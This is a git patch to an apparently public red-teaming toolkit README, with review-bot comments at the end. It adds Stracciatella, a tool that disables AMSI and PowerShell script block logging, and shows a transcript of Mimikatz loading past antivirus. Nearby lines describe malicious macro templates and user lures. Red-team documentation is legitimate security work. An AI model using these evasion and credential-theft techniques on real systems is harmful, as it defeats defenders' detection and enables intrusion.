From f92bc1a10b8adfeb4a04e1256e50b79dc3b9b7ce Mon Sep 17 00:00:00 2001 From: mb Date: Wed, 26 Jun 2019 03:51:02 +0200 Subject: [PATCH] Added Stracciatella --- .gitmodules | 3 ++ red-teaming/README.md | 76 +++++++++++++++++++++++++++++++++++++++ red-teaming/Stracciatella | 1 + 3 files changed, 80 insertions(+) create mode 160000 red-teaming/Stracciatella diff --git a/.gitmodules b/.gitmodules index 00f600b..b981567 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,3 +31,6 @@ [submodule "web/proxy2"] path = web/proxy2 url = https://github.com/mgeeky/proxy2 +[submodule "red-teaming/Stracciatella"] + path = red-teaming/Stracciatella + url = https://github.com/mgeeky/Stracciatella.git diff --git a/red-teaming/README.md b/red-teaming/README.md index 93e49f0..0ba1aa7 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md 
@@ -277,6 +277,82 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree - **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9)) +- **`Stracciatella`** - Powershell runspace from within C# (aka `SharpPick` technique) with AMSI and Script Block Logging disabled for your pleasure. + + * This program provides functionality to decode passed parameters on the fly, using Base64 and Xor single-byte decode (also combined) + * Before launching any command, it makes sure to disable AMSI using two approaches + * Before launching any command, it makes sure to disable Script Block logging using two approaches + * This program does not patch any system library, system native code (think amsi.dll) + * Efforts were made to not store decoded script/commands excessively long, in order to protect itself from memory-dumping techniques governed by EDRs and AVs + * The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly + + +``` +PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 + + :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. + Mariusz B. / mgeeky, '19 + +[.] Will load script file: '.\Test2.ps1' +[+] AMSI Disabled. +[+] Script Block Logging Disabled. +[.] Language Mode: FullLanguage + +PS> & '.\Test2.ps1' +PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode +[+] Yeeey, it really worked. +It works like a charm! +FullLanguage + +PS D:\> "amsiInitFailed" +At line:1 char:1 ++ "amsiInitFailed" ++ ~~~~~~~~~~~~~~~~ +This script contains malicious content and has been blocked by your antivirus software. 
+ + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + + FullyQualifiedErrorId : ScriptContainedMaliciousContent + +PS D:\> . .\Invoke-Mimikatz.ps1 +At line:1 char:1 ++ . .\Invoke-Mimikatz.ps1 ++ ~~~~~~~~~~~~~~~~~~~~~~~ +This script contains malicious content and has been blocked by your antivirus software. + + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + + FullyQualifiedErrorId : ScriptContainedMaliciousContent + +PS D:\> .\Stracciatella.exe -v + + :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. + Mariusz B. / mgeeky, '19 + +[-] It looks like no script path was given. +[+] AMSI Disabled. +[+] Script Block Logging Disabled. +[.] Language Mode: FullLanguage + +Stracciatella D:\> . .\Invoke-Mimikatz.ps1 + +Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit" + + .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 + .## ^ ##. "A La Vie, A L'Amour" + ## / \ ## /* * * + ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) + '#####' with 20 modules * * */ + +mimikatz(powershell) # coffee + + ( ( + ) ) + .______. + | |] + \ / + `----' + +mimikatz(powershell) # ; +``` + - **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6)) - **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons. 
diff --git a/red-teaming/Stracciatella b/red-teaming/Stracciatella new file mode 160000 index 0000000..7255ecd --- /dev/null +++ b/red-teaming/Stracciatella @@ -0,0 +1 @@ +Subproject commit 7255ecd2f94f37e1fa04265a2fc33a0e418b6a14
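Review bot: the new submodule url in the `.gitmodules` hunk ends in `.git` (`url = https://github.com/mgeeky/Stracciatella.git`) while the existing entry directly above it (`url = https://github.com/mgeeky/proxy2`) does not; pick one form for the whole file, e.g. drop the `.git` suffix so the new entry matches the others.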
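Review bot: the example invocation in the README hunk runs `Stracciatella.exe -v -b -x 0x31 -c "..." .\Test2.ps1`, but none of the bullets above it explain what `-v`, `-b`, `-x` or `-c` do; add one line mapping `-b` to the Base64 decode and `-x` to the single-byte XOR key that the first bullet mentions, so readers do not have to infer the switches from the transcript. In the same hunk, three style points: the fenced transcript block starts at column 0 inside a `-` list item, which terminates the list in most Markdown renderers, so either indent the fence to the bullet's level or give the fence a language tag and accept it as a top-level block; the nested bullets use `*` while the rest of the list uses `-`; and "may be considered bit too large" should read "may be considered a bit too large", with "Powershell" spelled "PowerShell" as in the rest of the README.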
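Review bot: the gitlink hunk pins `red-teaming/Stracciatella` to `7255ecd2f94f37e1fa04265a2fc33a0e418b6a14`, but neither the README entry nor the commit message says the tool is pulled in as a submodule, so a plain checkout leaves that directory empty with no hint why; add a sentence to the README entry telling readers to run `git submodule update --init red-teaming/Stracciatella` (or clone with `--recurse-submodules`) before looking for the sources.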